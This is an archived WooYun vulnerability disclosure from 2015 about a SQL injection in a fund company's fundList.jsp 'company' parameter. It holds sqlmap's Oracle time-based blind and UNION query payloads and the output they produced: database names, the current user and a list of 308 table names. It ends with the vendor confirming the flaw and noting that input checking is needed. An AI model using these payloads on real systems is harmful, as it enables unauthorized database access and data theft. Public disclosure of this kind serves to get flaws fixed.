乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-06: 细节已通知厂商并且等待厂商处理中 2015-06-08: 厂商已经确认,细节仅向厂商公开 2015-06-18: 细节向核心白帽子及相关领域专家公开 2015-06-28: 细节向普通白帽子公开 2015-07-08: 细节向实习白帽子公开 2015-07-23: 细节向公众公开
233
http://www.nffund.com/fundList.jsp?company=1
---Parameter: company (GET) Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: company=1' AND 6600=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'cgml'='cgml Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: company=1' UNION ALL SELECT NULL,CHR(113)||CHR(107)||CHR(98)||CHR(113)||CHR(113)||CHR(97)||CHR(101)||CHR(70)||CHR(119)||CHR(116)||CHR(117)||CHR(76)||CHR(106)||CHR(99)||CHR(116)||CHR(113)||CHR(106)||CHR(118)||CHR(106)||CHR(113) FROM DUAL-- ---web application technology: Apache, Servlet 2.5, JSP, JSP 2.1back-end DBMS: Oraclecurrent user: 'FCDB'available databases [6]:[*] EXFSYS[*] FCDB[*] MDSYS[*] SYS[*] SYSTEM[*] WINDDatabase: FCDB[308 tables]+------------------------+| ACCPP || ANNOUNMT || ANNOUNMT1 || APAY || APL5C || ARAA || ARL5D || ARTRU || ASSETAL || BCASHF || BENCHMARK_COMPARISON || BEQPMT || BESTIMATE || BHDQUOTE || BMIRATE || BONDACHG || BONDBASEINFO || BONDCCS || BONDCF || BONDDT || BONDECLAUSE || BONDHOLDER || BONDIPLAN || BONDISSUE || BONDLIST || BONDPO || BONDSDT || BONDTYPES || BONDUWRT || BONDWTY || BOND_CGCHG || BOND_IRCHG || BSHEET || BSHEET_I || BSHEET_NEW || BSHOLDING || BYIELDCURVE || CAREMINDER || CAREMINDERCODE || CASHEQ || CBPROVISION || CBSHEET || CBSHEET_NEW || CFIP || CFPROFILE || CFST || CFST_I || CFST_NEW || CGREC || CHDQUOTE || CHGSTOCK || CIHDQUOTE || CINDUSTRY || CINST || CINST_NEW || CMB_REPORT_RESEARCH || CMB_REPORT_SUBTABLE || COMPANYCODE || CONSTPRG || COPINTRO || CPARTY || CPFCHG || CPROFILE || CUST_RANGE_SYS || CUST_SPARE_LIST || CUST_SYSTEM || DACCMG || DATADICT_COLUMNS || DATADICT_OBJECTS || DB_DERIVE_CWZK_N || DB_DERIVE_CWZK_T || DB_DE_CWZB_ALLSYMBOL || DB_DE_JZZB || DCRP || DERC_BOND || DERC_EQACHQUOTE || DERC_EQHCHQUOTE || DERC_EQRETURN || DERFQUOTE || DERIAFRATIOS || DERNAV || DERQFRATIOS || DER_FIN_MAIN || DER_REPORT_RESEARCH || DER_REPORT_SUBTABLE || DER_STOCK_BASE || DEXP || DHISTORY || DISHTY || DISPARA_FUND || DISPARA_NEW || DIVPBL || DNLD_TABLERIGHT || DOWNSTATE || EFCT || EHLIST || EQPMT || ESTR || FAAD || FADS || FCDT_BLK_UNPACK_LOG || FCMG || FCOWNER || FCSHARE || FEGATHER || FEXP || FHDQUOTE || FHDQUOTE_BAK || FHOLDER || FHOLDER_CHG || FIBSHEET || FIBSHEET_NEW || FICFST || FICFST_NEW || FIINST || FIINST_NEW || FINFO || FISS || FLOW_DOWN_VERIFY || FPARTY || FPCHG || FQUOTE || FRATIOS || FSHARE || FTCHG || FUNDMG || FUND_BENCHMARK || FUTURESCTINFO || FUTURESINFO || GFINA || GG_INDUSTRY_LIST || GIBORATE || GUARANTY || HKANNOUNMT || HKETFPROFILE || HKFSHARECHG || HKHDQUOTE || HKWBINFO || HKWSHARECHG || HKWTRADE || HK_DHISTORY || HK_FINDATA || HK_FINSUBJECTS || HK_NAV || HK_RSHEET || HK_RTDIV || HK_RTDIVSIA || HK_SCSTC || IBBHDQUOTE || IBBONDINDEX || ICRATE || IDCOMPT || IDSTATISTICS || INDUSTRYCHG || INST_I || INTERESTRATE || INTERIT || INTGASSET || INVENTORY || INVPROJ || INVPROJ_R || IPORT || IPROFILE || ISHOLDING || ISSUEEXP || ISSWEIGHT || ITANNOUNMT || ITPROFILE || I_ABH || I_AUTHOR_CREDIT || I_CALLING_LIST || I_CALLING_MAPPING || I_ORGAN_SCORE || I_ORG_INFO || I_REPORT_TYPE || I_SYS_CLASS || JJGLR || JJTGR || JJTZBZ || JJXLDY || JJXLJJ || LAWSREG || LAWSUITNARBTG || LAWS_USE || LFSHARE || LTDEXP || MEMORD || MFDATA_I || MFRATIO || MFRATIO_NEW || MGBGD || MGSNH || MGTEAM || NAV || NAV_CUR || NEWS || NHLIST || NTRAD || OEBONDCHANGE || OEBONDRR || OFIP || OFPROFILE || PAAA || PAYMETPRIN || PFOP || PIBOND || PICORR || PISEC_RELATIONS || PISTOCK || PLAN_TABLE || PRODUCTDES || PROVISION || QDBHOLD || QDFHOLD || QDIPORT || QDSHOLD || QUOTE_ZRITIC || RBSHD || RDPDT || RDREG || RDSEC || REPINFO || REPO || REPOCR || RESREDEM || REVCHG || RPAR || RPTRANS || RPTS || SACCVOL || SCFP || SCSTC || SCSTCCHG || SECURITYCODE || SECURITYCODE_R || SECURITYST || SEQCHG || SFRZ || SHAREHDLIST || SHAREHDLIST_NEG || SHOLDING || SIAFO || SIAIPO || SIBASEINFO || SIIDATE || SIPMTD || SIPTS || SQLEXECUTE || SRPT || SSOP || STEPUPBOND || STOCKNAME || STRANSFER || STSTD || STSTD_20120329 || SYMBOL_COMP || SYMBOL_ISINCODE || TAXATION || TAXPBL || TEMPFUNDPX || TQ_FIN_HKCFSTATEMENT || TQ_FIN_HKFININFO || TQ_FIN_HKHBALBSHEET || TQ_FIN_HKHCFSTATEMENT || TQ_FIN_HKHINCSTATEMENT || TQ_FIN_HKINCSTATEMENT || TQ_FIN_HKINDICDATA || TQ_FIN_HKNOTESDATA || TQ_FIN_HKNOTESINFO || TQ_FIN_HKSHEET || TQ_QT_HKSKADJUSTQT || TQ_QT_HKSKDAILYPRICE || TQ_SK_HKANNOUNCEMT || TQ_SK_HKBASICINFO || TQ_SK_HKBONUS || TQ_SK_HKDRTRANS || TQ_SK_HKEMPLOYEES || TQ_SK_HKFINSHARESTAT || TQ_SK_HKIMPORTANTDATE || TQ_SK_HKISSOBJECT || TQ_SK_HKISSPARTY || TQ_SK_HKISSUE || TQ_SK_HKMKTPROFILE || TQ_SK_HKODDLOT || TQ_SK_HKPLACING || TQ_SK_HKRIGHTISSUE || TQ_SK_HKSHAREHOLDER || TQ_SK_HKSHAREREPAMT || TQ_SK_HKSHAREREPPLAN || TQ_SK_HKSHARESTRUCHG || TQ_SK_HKSKACAPDETAIL || TQ_SK_HKTAXDIVIDEND || TSTAT || T_QX_DTDATA || T_QX_DTDATA2 || T_QX_JINGJIA || UDANNOUNMT || UPLOG || UWRT || WARANNOUNMT || WARCLINFO || WARDATE || WAREPRICE_CHG || WARHINFO || WARRANTINFO || WARSHARE_CHG || WARSHARE_CHG_D || WRTHDQUOTE |+------------------------+
~~~~~~~~~
危害等级:低
漏洞Rank:3
确认时间:2015-06-08 17:22
谢谢反馈,需要对输入参数进行检查
暂无